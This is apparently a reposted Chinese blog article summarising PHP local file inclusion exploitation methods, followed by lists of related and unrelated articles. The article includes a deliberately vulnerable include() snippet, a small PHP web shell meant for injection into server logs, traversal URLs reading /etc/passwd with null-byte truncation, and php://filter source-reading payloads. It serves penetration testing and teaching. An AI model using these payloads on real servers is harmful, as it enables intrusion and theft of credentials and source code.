主要涉及到的函数
include(),require()、include_once(),require_once()
magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file()
、readfile() file()、and file_get_contents()、upload_tmp_dir()、post_max_size()、and
max_input_time()等

典型漏洞代码:
<!–?php include($_GET['pages'].‘.php’);
?–>

黑盒判断方法:
单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。
本地包含漏洞的利用(这里先忽略截断问题)

1、包含同服务器中上传的jpg、txt、rar等文件,这个是最理想的情况了。
2、包含系统的各种日志,如apache日志,文件系统日志等
其中apache当记录格式为combined,一般日志都会很大,基本无法包含成功。包含log是有自动化攻击程序的。
其中鬼子的博客中有提到一个空格的问题。见《邪恶的空格-PHP本地文件包含漏洞的新突破口》
解决空格问题其实把一句话base64加密后再写入就可以执行了。
3、包含/proc/self/environ .
这个环境变量有访问web的session信息和包含user-agent的参数。user-agent在客户端是可以修改的。参考:《Shell via LFI
–proc/self/environ method//http://hi.baidu.com/root_exp/blog/item
/9c0571fc2d42664fd7887d7d.html》
4、包含由php程序本身生成的文件,缓存、模版等,开源的程序成功率大。
5、利用本地包含读取PHP敏感性文件,需要PHP5以上版本。如看到“config”的源码如下
index.php?pages=php://filter/read=convert.base64-encode/resource=config
特别的情况用到readfile()
函数不是包含执行,可以直接读源码。
6、利用phpinfo页面getshell。一般大组织的web群存在phpinfo的机会挺大的。
poc和介绍参考《利用phpinfo信息LFI临时文件》//http://www.2cto.com/Article/201202/119213.html
7、利用包含出错,或者包含有未初始化变量的PHP文件,只要变量未初始化就可能再次攻击
具体见《include()本地文件包含漏洞随想》//http://www.2cto.com/Article/200809/29748.html
8、结合跨站使用  index.php?pages=http:// www.2cto.com
/path/xss.php?xss=phpcode (要考虑域信任问题)
9、包含临时文件文件。这个方法很麻烦的。参考 《POST method
uploads》//http://www.php.net/manual/en/features.file-upload.post-method.php
解决临时文件删除方法:慢连接
(注:前提是file_uploads = On,5.3.1中增加了max_file_uploadsphp.ini file_uploads =
On,5.3.1中增加了max_file_uploads,默认最大一次上传20个)
windows格式:win下最长4个随机字符( ‘a’-’z’,
‘A’-’Z’, ’0′-’9′)如:c:/windows/temp/php3e.tmp
linux格式:6个随机字符( ‘a’-’z’,
‘A’-’Z’, ’0′-’9′)
如:/tmp/phpUs7MxA
慢连接的两种上传代码参考:《PHP安全之LFI漏洞GetShell方法大阅兵》//www.2cto.com/Article/201106/94414.html

10、当前实在找不到写权限目录时候,注入到log中再寻找写权限目录。如注入<?php
$s=$_GET;@chdir($s['x']);echo @system($s['y'])?>到log.
Linux:
index.php?pages=/var/log/apache/logs/error_log%00&x=/&y=uname
windows:
index.php?pages=..\apache\logs\error.log%00&x=.&y=dir
具体参考《PHP本地文件包含(LFI)漏洞利用》http://www.2cto.com/Article/201202/119214.html
11、使用php
wrapper例如php://input、php://filter、data://等包含文件 在《PHP 5.2.0 and
allow_url_include》//http://blog.php-security.org/archives/45-PHP-5.2.0-
and-allow_url_include.html 其中文中提到的allow_url_fopen和allow_url_include只是保护了against
URL handles标记为URL.这影响了http(s) and ftp(s)但是并没有影响php或date
这些url形式。
12、LFI判断目录是否存在和列目录,如
**index.php?pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00
**这个方法在TTYshell上是可以完全是可以判断的,但是在URL上有时候不可行。即使不存在dossierexistant也可以回显passwd内容。
index.php?pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00
**FreeBSD
《directory listing with PHP file functions》http://websec.wordpress.com/2009
…php-file-functions/ 列目录
**存在逻辑判断的时候,如不存在该目录就会返回header.php+File not
found+footer.php
存在就会返回header.php+footer.php。这种逻辑很符合程序员的习惯。曾经用找到了一个目录很深的日志获得shell。
13、包含SESSION文件,php保存格式sess_SESSIONID
默认位置是/tmp/(PHP Sessions)、/var/lib/php/session/(PHP Sessions)、/var/lib/php5/(PHP
Sessions) 和c:/windows/temp/(PHP Sessions)等文件中。
14、包含/proc/self/cmdline
或者/proc/self/fd/<fd number>找到log文件 (拥有者为root,默认情况要root才能访问)
具体参考Local
File Inclusion – 《Tricks of the Trade》http://labs.neohapsis.com/2008/0
…ricks-of-the-trade/ 还有其他提到包含/var/log/auth.log的,但是这个文件默认情况也是644.
15、包含maillog
通常位置/var/log/maillog 这个方法也很鸡肋,具体参考《local file inclusion tricks
》http://devels-playground.blogspo
…clusion-tricks.html
16、包含固定的文件,非常鸡肋,为了完整性也提下。如,可用中间人攻击。
<?php
include(“http://172.0.0.1/code.php “);
?>

关于截断
(简单介绍下,谷歌下很多文章提到了)
截断要考虑两个问题magic_quotes_gpc()和PHP版本。

1、%00空字符截断,除了这个截断在php
5.3.4以下版本好用外,以下截断都是有条件的。
2、windows
Linux文件名大于4096字符被截断
Windows:
文件名大于256字符被截断
参考的文档很多就不一一列举了。这个文章希望能给大家遇到LFI的时候有点帮助。

LFI漏洞利用总结(转载)的更多相关文章

  1. LFI漏洞利用总结

    主要涉及到的函数 include(),require().include_once(),require_once() magic_quotes_gpc().allow_url_fopen().allo ...

  2. JBoss远程方法调用漏洞利用详解

    早上起床打开微博看到空虚浪子心大神发的一篇有关Jboss漏洞的文章,对我等菜鸟来说那边文章看起来还是很吃力的,所以查了查国内外的资料,翻译写了这边文章,记录一下. 在JBoss服务器上部署web应用程 ...

  3. Windows漏洞利用与防护(2015.8)

    Windows平台下的漏洞利用与防护 0x00 概述 在过去的二十几年,Windows作为网络安全的主战场之一,攻于防的较量从未停息过.内存破坏漏洞作为研究的重点之一,经历了很多的发展也沉淀了前辈们许 ...

  4. 【更新WordPress 4.6漏洞利用PoC】PHPMailer曝远程代码执行高危漏洞(CVE-2016-10033)

    [2017.5.4更新] 昨天曝出了两个比较热门的漏洞,一个是CVE-2016-10033,另一个则为CVE-2017-8295.从描述来看,前者是WordPress Core 4.6一个未经授权的R ...

  5. CVE-2017-11882漏洞利用

    CVE-2017-11882漏洞利用 最新Office的CVE-2017-11882的poc刚刚发布出来,让人眼前一亮,完美无弹窗,无视宏,影响Ms offcie全版本,对于企业来说危害很大.在此简单 ...

  6. Linux64位程序中的漏洞利用

    之前在栈溢出漏洞的利用和缓解中介绍了栈溢出漏洞和一些常见的漏洞缓解 技术的原理和绕过方法, 不过当时主要针对32位程序(ELF32). 秉承着能用就不改的态度, IPv4还依然是互联网的主导, 更何况 ...

  7. phpMyAdmin 4.8.x 本地文件包含漏洞利用

    phpMyAdmin 4.8.x 本地文件包含漏洞利用 今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell.该漏洞利用 ...

  8. phpMyAdmin 4.7.x CSRF 漏洞利用

    作者:Ambulong phpMyAdmin是个知名MySQL/MariaDB在线管理工具,phpMyAdmin团队在4.7.7版本中修复了一个危害严重的CSRF漏洞(PMASA-2017-9),攻击 ...

  9. KPPW2.5 漏洞利用--SQL注入

    KPPW2.5 漏洞利用--SQL注入 SQL注入--布尔型盲注 环境搭建 1,集成环境简单方便,如wamp,phpstudy.... 2,KPPW v2.2源码一份(文末有分享)放到WWW目录下面 ...

随机推荐

  1. mysql explain中key_len的计算

    ken_len表示索引使用的字节数,根据这个值,就可以判断索引使用情况,特别是在组合索引的时候,判断是否所有的索引字段都被查询用到. key_len显示了条件检索子句需要的索引长度,但 ORDER B ...

  2. Java SE 6 新特性: Java DB 和 JDBC 4.0

    http://www.ibm.com/developerworks/cn/java/j-lo-jse65/index.html 长久以来,由于大量(甚至几乎所有)的 Java 应用都依赖于数据库,如何 ...

  3. Ui篇--layout_weight体验(实现按比例显示)

    在android开发中LinearLayout很常用,LinearLayout的内控件的android:layout_weight在某些场景显得非常重要,比如我们需要按比例显示.android并没用提 ...

  4. HDU-4035 Maze

    http://acm.hdu.edu.cn/showproblem.php?pid=4035 树上的概率dp.   Maze Time Limit: 2000/1000 MS (Java/Others ...

  5. IOS 时间 日历 处理集合

    1.获得当前时间 从1970开始的秒数 NSTimeInterval time = [[NSDate date[ timeIntervalSince1970]]; NSString * str = [ ...

  6. 仿酷狗音乐播放器开发日志二十五 duilib右键事件的不足的bug修复

    转载请说明原出处,谢谢~~ 虽然仿酷狗的各个菜单早就写好了,但是一直没有附加到程序里.今天把菜单和播放列表控件关联时发现了问题. 和播放列表相关的菜单有三个,分别是每个音乐项目控件相关的菜单.分组的菜 ...

  7. 修复duilib库UISlider控件的4个bug

    转载级请注明原出处,谢谢~· 昨天封装好一个音频类,我在为dulib做音频播放demo时发现了一些问题,由CSliderUI控件导致的,进而发现了这个控件的好几样不足,他无法满 足我们做一个播放器的进 ...

  8. <转>配置DNS辅助服务器:DNS系列之四

    配置DNS辅助服务器   在前面的博文中,我们介绍了如何在DNS服务器中创建常用的DNS记录,本文中我们要为大家介绍如何配置DNS的辅助服务器,同时也要介绍一下和辅助区域类似的存根区域. DNS辅助服 ...

  9. 利用redis分布式锁的功能来实现定时器的分布式

    文章来源于我的 iteye blog http://ak478288.iteye.com/blog/1898190 以前为部门内部开发过一个定时器程序,这个定时器很简单,就是配置quartz,来实现定 ...

  10. 【SPOJ】Transposing is even more fun!

    题意: 给出a.b 表示按先行后列的方式储存矩阵 现在要将其转置 可以交换两个点的位置 求最小操作次数 题解: 储存可以将其视为拉成一条链 设a=5.b=2 则在链上坐标用2^***(a,b)表示为( ...